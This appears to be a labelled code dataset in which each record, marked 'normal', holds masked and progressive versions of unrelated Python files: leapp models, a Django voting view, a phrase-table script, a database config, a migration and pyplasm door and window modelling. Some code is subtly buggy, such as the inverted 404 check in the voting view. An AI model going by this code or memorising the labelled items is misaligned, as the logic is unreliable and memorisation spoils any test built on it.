fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-4": "<mask token>\n\n\nclass TargetRepositoryBase(Model):\n topic = TransactionTopic\n repoid = fields.String()\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-5": "from leapp.models import Model, fields\nfrom leapp.topics import TransactionTopic\n\n\nclass TargetRepositoryBase(Model):\n topic = TransactionTopic\n repoid = fields.String()\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass 
RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[])\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-ids": [ 9, 10, 11, 12, 14 ] }
[ 9, 10, 11, 12, 14 ]
from django.shortcuts import render from .models import Votings from .serializers import VotingsSerializer from rest_framework.response import Response from rest_framework import status from rest_framework.decorators import api_view import requests, json @api_view(['GET']) def votings(request): votings = Votings.objects.all() if votings: return Response({}, status=status.HTTP_404_NOT_FOUND) else: serializer = VotingsSerializer(votings) r = requests.get('https://api.myjson.com/bins/17w6e1', serializer) data = json.loads(r.text) return Response(data, status=status.HTTP_201_CREATED)
normal
{ "blob_id": "c3ecac1c0facbf6f0905bb03fd337a7f4f5bbeff", "index": 4376, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@api_view(['GET'])\ndef votings(request):\n votings = Votings.objects.all()\n if votings:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = VotingsSerializer(votings)\n r = requests.get('https://api.myjson.com/bins/17w6e1', serializer)\n data = json.loads(r.text)\n return Response(data, status=status.HTTP_201_CREATED)\n", "step-3": "from django.shortcuts import render\nfrom .models import Votings\nfrom .serializers import VotingsSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nimport requests, json\n\n\n@api_view(['GET'])\ndef votings(request):\n votings = Votings.objects.all()\n if votings:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = VotingsSerializer(votings)\n r = requests.get('https://api.myjson.com/bins/17w6e1', serializer)\n data = json.loads(r.text)\n return Response(data, status=status.HTTP_201_CREATED)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
#!/usr/bin/python2 import sys import argparse """ This program generates an extract table having the following format: <S1> <S2> <S3> ... <Sn> ||| <T1> <T2> <T3> ... <Tk> ||| 0-0 Each line is a mapping from a source sentence to target sentence with special delimiter characters. You can give the output of this script to extract2bin to generate a binary phrase table. """ def main(): parser = argparse.ArgumentParser() parser.add_argument("source_text", type=argparse.FileType("r"), help="Tokenized sentences in the source language") parser.add_argument("target_text", type=argparse.FileType("r"), help="Tokenized sentences in the target language") args = parser.parse_args() src_lines = args.source_text.readlines() len_src = len(src_lines) tgt_lines = args.target_text.readlines() len_tgt = len(tgt_lines) if len_src != len_tgt: print "Number of sentences doesn't match: %d - %d\n" % (len_src,len_tgt) return 1 for s, t in zip(src_lines, tgt_lines): print "%s ||| %s ||| 0-0" % (s.rstrip(), t.rstrip()) args.source_text.close() args.target_text.close() if __name__ == '__main__': sys.exit(main())
normal
{ "blob_id": "cf0cf028d5f67e8deca8ebd3ad76d9c1e3563002", "index": 258, "step-1": "#!/usr/bin/python2\n\nimport sys\nimport argparse\n\n\"\"\"\nThis program generates an extract table having the following format:\n <S1> <S2> <S3> ... <Sn> ||| <T1> <T2> <T3> ... <Tk> ||| 0-0\n\nEach line is a mapping from a source sentence to target sentence\nwith special delimiter characters.\n\nYou can give the output of this script to extract2bin to generate\na binary phrase table.\n\"\"\"\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"source_text\", type=argparse.FileType(\"r\"),\n help=\"Tokenized sentences in the source language\")\n parser.add_argument(\"target_text\", type=argparse.FileType(\"r\"),\n help=\"Tokenized sentences in the target language\")\n args = parser.parse_args()\n\n src_lines = args.source_text.readlines()\n len_src = len(src_lines)\n tgt_lines = args.target_text.readlines()\n len_tgt = len(tgt_lines)\n\n if len_src != len_tgt:\n print \"Number of sentences doesn't match: %d - %d\\n\" % (len_src,len_tgt)\n return 1\n\n for s, t in zip(src_lines, tgt_lines):\n print \"%s ||| %s ||| 0-0\" % (s.rstrip(), t.rstrip())\n\n args.source_text.close()\n args.target_text.close()\n\nif __name__ == '__main__':\n sys.exit(main())\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import os def get_os_env_value(key): return os.getenv(key) def get_mysql_uri(user, password, host, database): return f'mysql+pymysql://{user}:{password}@{host}/{database}' MASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER') MASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value('MASTER_MYSQL_DATABASE_PASSWORD') MASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST') MASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value('MASTER_MYSQL_DATABASE_DB_CASAONE') # SQLALCHEMY_POOL_RECYCLE = 60 * 10 # SQLALCHEMY_POOL_TIMEOUT = 60 * 20 SQLALCHEMY_TRACK_MODIFICATIONS = True SQLALCHEMY_ECHO = True SQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER, MASTER_MYSQL_DATABASE_PASSWORD, MASTER_MYSQL_DATABASE_HOST, MASTER_MYSQL_DATABASE_DB_CASAONE) SQLALCHEMY_ENGINE_OPTIONS = { "pool_pre_ping": True }
normal
{ "blob_id": "8247b045a5aed4d0f3db6bc2c0edd985f2c4ba30", "index": 5305, "step-1": "<mask token>\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\nMASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER')\nMASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_PASSWORD')\nMASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST')\nMASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_DB_CASAONE')\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_ECHO = True\nSQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER,\n MASTER_MYSQL_DATABASE_PASSWORD, MASTER_MYSQL_DATABASE_HOST,\n MASTER_MYSQL_DATABASE_DB_CASAONE)\nSQLALCHEMY_ENGINE_OPTIONS = {'pool_pre_ping': True}\n", "step-4": "import os\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\nMASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER')\nMASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_PASSWORD')\nMASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST')\nMASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_DB_CASAONE')\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_ECHO = True\nSQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER,\n MASTER_MYSQL_DATABASE_PASSWORD, MASTER_MYSQL_DATABASE_HOST,\n MASTER_MYSQL_DATABASE_DB_CASAONE)\nSQLALCHEMY_ENGINE_OPTIONS = {'pool_pre_ping': True}\n", "step-5": "import os\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\nMASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER')\nMASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value('MASTER_MYSQL_DATABASE_PASSWORD')\nMASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST')\nMASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value('MASTER_MYSQL_DATABASE_DB_CASAONE')\n\n# SQLALCHEMY_POOL_RECYCLE = 60 * 10\n# SQLALCHEMY_POOL_TIMEOUT = 60 * 20\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_ECHO = True\n\nSQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER, MASTER_MYSQL_DATABASE_PASSWORD,\n MASTER_MYSQL_DATABASE_HOST, MASTER_MYSQL_DATABASE_DB_CASAONE)\n\nSQLALCHEMY_ENGINE_OPTIONS = {\n \"pool_pre_ping\": True\n}\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# Generated by Django 2.0.5 on 2019-06-12 08:03 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('doctor', '0257_merge_20190524_1533'), ('doctor', '0260_merge_20190604_1428'), ] operations = [ ]
normal
{ "blob_id": "a5dff32dfbe93ba081144944381b96940da541ad", "index": 7802, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0257_merge_20190524_1533'), ('doctor',\n '0260_merge_20190604_1428')]\n operations = []\n", "step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0257_merge_20190524_1533'), ('doctor',\n '0260_merge_20190604_1428')]\n operations = []\n", "step-5": "# Generated by Django 2.0.5 on 2019-06-12 08:03\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('doctor', '0257_merge_20190524_1533'),\n ('doctor', '0260_merge_20190604_1428'),\n ]\n\n operations = [\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from pyplasm import * doorY = [.2,.18,.08,.18,.08,.18,.4,.18,.08,.18,.08,.18,.2] doorX = [.2,.5,.2,1.8,.08,.18,.08,.18,.2] doorOccurrency = [[True]*13, [True, False, True, False, True, False, True, False, True, False, True, False, True], [True]*13, [True, False, True, False, True, False, True, False, True, False, True, False, True], [True, False, True, False, True, True, True, True, True, False, True, False, True], [True, False, True, False, False, False, True, False, False, False, True, False, True], [True, False, True, True, True, True, True, True, True, True, True, False, True], [True, False, False, False, False, False, True, False, False, False, False, False, True], [True]*13] windowY = [0.04,0.04,0.2,0.02,0.16,0.02,0.2,0.04,0.04] windowX = [0.02,0.8,0.05,0.02,0.4,0.02,0.4,0.05,0.04] windowOccurrency = [[True]*9, [True, False, False, False, False, False, False, False, True], [True]*9, [True]*9, [True, True, False, True, False, True, False, True, True], [True]*9, [True, True, False, True, False, True, False, True, True], [True]*9, [True]*9] def resizeXY(X, Y, occurrency, dx, dz): """This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values contained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed""" sumY = sum(Y) sumX = sum(X) visitedY = [False]*len(Y) for y_index in range(len(Y)): update = True for x_index in range(len(X)): if(occurrency[x_index][y_index] == False): update = False if(update): sumY = sumY - Y[y_index] sumX = sumX - X[y_index] dx = dx - X[y_index] dz = dz - Y[y_index] for x_index in range(len(X)): modifyX = False for y_index in range(len(Y)): if(occurrency[x_index][y_index] == False and visitedY[y_index] == False): Y[y_index] = (dz * Y[y_index])/sumY visitedY[y_index] = True modifyX = True if(occurrency[x_index][y_index] == False and visitedY[y_index] == True and not modifyX): modifyX = True if(modifyX): X[x_index] = (dx * X[x_index])/sumX def window(windowX, windowY, occurrency): """This function, given three array, X, Y and occurrency, return the HPC model of the window generated according to the three parameters. X and Y contain values of distances calculated on the previous segment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. The inner function is useful for 'scaling'""" def window0(dx, dy, dz): resizeXY(windowX,windowY,occurrency, dx, dz) model = [] for xIndex in range(len(windowX)): yQuotes = [] xSum = sum(windowX[:xIndex]) for yIndex in range(len(windowY)): if(occurrency[xIndex][yIndex] == False): yQuotes.append(-windowY[yIndex]) else: yQuotes.append(windowY[yIndex]) model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(yQuotes)])) result = STRUCT(model) result = MAP([S2,S3,S1])(PROD([result, Q(dy)])) windowFrame = STRUCT([result]) windowFrame = TEXTURE(["iron.jpg"])(windowFrame) glass = CUBOID([SIZE([1])(result)[0]*0.98,0.001,SIZE([3])(result)[0]*0.95]) glass = T([1,2,3])([dx*0.005, dy/2, 0.01])(glass) glass = TEXTURE(["glass2.jpg"])(glass) window = STRUCT([windowFrame, glass]) window = S([1,2,3])([dx/SIZE([1])(window)[0], dy/SIZE([2])(window)[0], dz/SIZE([3])(window)[0]])(window) return window return window0 def door(doorX, doorY, occurrency): """This function takes in input three array, X, Y and occurrency and returns the HPC model of the door generated according to the three parameters. X and Y contain values of distances calculated on the previous segment of the axis. 
Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. The inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.""" def door0(dx, dy, dz): model = [] for xIndex in range(len(doorX)): yQuotes = [] xSum = sum(doorX[:xIndex]) for yIndex in range(len(doorY)): if(occurrency[xIndex][yIndex] == False): yQuotes.append(-doorY[yIndex]) else: yQuotes.append(doorY[yIndex]) model.append(PROD([ QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)])) res = PROD([STRUCT(model), Q(dy)]) res = MAP([S2,S3,S1])(res) res = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (res) door = TEXTURE(["wood.jpg", True, False, 1, 1, 0, 1, 1])(STRUCT([res])) glass = CUBOID([SIZE([1])(res)[0]*0.94, 0.01, SIZE([3])(res)[0]*0.94]) glass = T([1,2,3])([dx*0.003, dy/2, dz*0.005])(glass) glass = TEXTURE(["glass.jpg"])(glass) refiner = CUBOID([0.03, 0.01,dz]) refiner = T([1,2])([dx/2,dy])(refiner) refiner = TEXTURE(["wood.jpg", True, False, 1, 1, 0, 1, 1])(refiner) handler1 = T(3)(.15)(CUBOID([.05,.02,.2])) handler2 = CUBOID([.05,.02,.05]) handler3 = T([1,2])([.01,.02])(CUBOID([.03,.02,.2])) handler = TEXTURE("bronze.jpg")(STRUCT([handler3, handler2, handler1])) handler = T([1,2,3])([dx/2.-2*SIZE([1])(handler)[0],dy, dz/2.-1.5*SIZE([3])(handler)[0]])(handler) finalDoor = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (STRUCT([door, glass, refiner, handler])) return finalDoor return door0 VIEW(door(doorX, doorY, doorOccurrency)(2.2, .4, 2.8)) VIEW(window(windowX,windowY,windowOccurrency)(.6,.1,1.2))
normal
{ "blob_id": "9bc955def6250908050a1f3046dd78480f25e0a1", "index": 1898, "step-1": "<mask token>\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. 
\n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. 
\n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, 0.4, 2.8))\nVIEW(window(windowX, windowY, windowOccurrency)(0.6, 0.1, 1.2))\n", "step-3": "<mask token>\ndoorY = [0.2, 0.18, 0.08, 0.18, 0.08, 0.18, 0.4, 0.18, 0.08, 0.18, 0.08, \n 0.18, 0.2]\ndoorX = [0.2, 0.5, 0.2, 1.8, 0.08, 0.18, 0.08, 0.18, 0.2]\ndoorOccurrency = [[True] * 13, [True, False, True, False, True, False, True,\n False, True, False, True, False, True], [True] * 13, [True, False, True,\n False, True, False, True, False, True, False, True, False, True], [True,\n False, True, False, True, True, True, True, True, False, True, False, \n True], [True, 
False, True, False, False, False, True, False, False, \n False, True, False, True], [True, False, True, True, True, True, True, \n True, True, True, True, False, True], [True, False, False, False, False,\n False, True, False, False, False, False, False, True], [True] * 13]\nwindowY = [0.04, 0.04, 0.2, 0.02, 0.16, 0.02, 0.2, 0.04, 0.04]\nwindowX = [0.02, 0.8, 0.05, 0.02, 0.4, 0.02, 0.4, 0.05, 0.04]\nwindowOccurrency = [[True] * 9, [True, False, False, False, False, False, \n False, False, True], [True] * 9, [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True] * 9]\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous 